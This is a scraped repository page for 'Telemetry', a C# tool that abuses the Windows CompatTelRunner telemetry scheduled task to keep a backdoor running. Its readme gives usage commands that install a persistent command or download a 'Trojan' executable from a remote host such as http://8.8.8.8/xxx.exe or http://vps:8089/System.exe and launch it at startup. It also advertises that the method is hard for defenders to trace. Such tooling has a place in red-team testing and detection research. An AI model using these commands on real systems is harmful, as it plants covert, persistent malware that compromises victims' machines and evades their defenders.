360-Linton-Lab/ Telemetry
Need help with Telemetry?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.
About the developer
212 Stars 
43 Forks 
6 Commits 
0 Opened issues 
Description
WINDOWS TELEMETRY权限维持
Services available
Contributors list
Readme
TELEMETRY
Background
TELEMETRY is a C# For Windows PERSISTENCE
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.
- Local admin rights to install (requires the ability to write to HKLM)
- Have CompatTelRunner.exe
- 2008R2/Windows 7 through 2019/Windows 10
Advantage
- Using the system's own Telemetry planned tasks
- Only registry suspicious backdoor troubleshooting
Command Line Usage
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
.Imanfeng
Features:
Install: - Deployment authority maintains backdoor
Command:
TELEMETRY.exe install /command:calc
- Execute command without file backdoor
TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
- Remotely download Trojan files to the specified directory for backdoor startup
TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
- Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup
TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
- Set path Trojan files for backdoor startup
Parameter:
/command: - Execute Command
/url: - Download FROM
/path: - Download To
- Execute command without file backdoor
Telemetry.exe install /command:calc
- Remotely download Trojan files for backdoor startup
Telemetry.exe install /url:http://vps:8089/System.exe
Learn
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/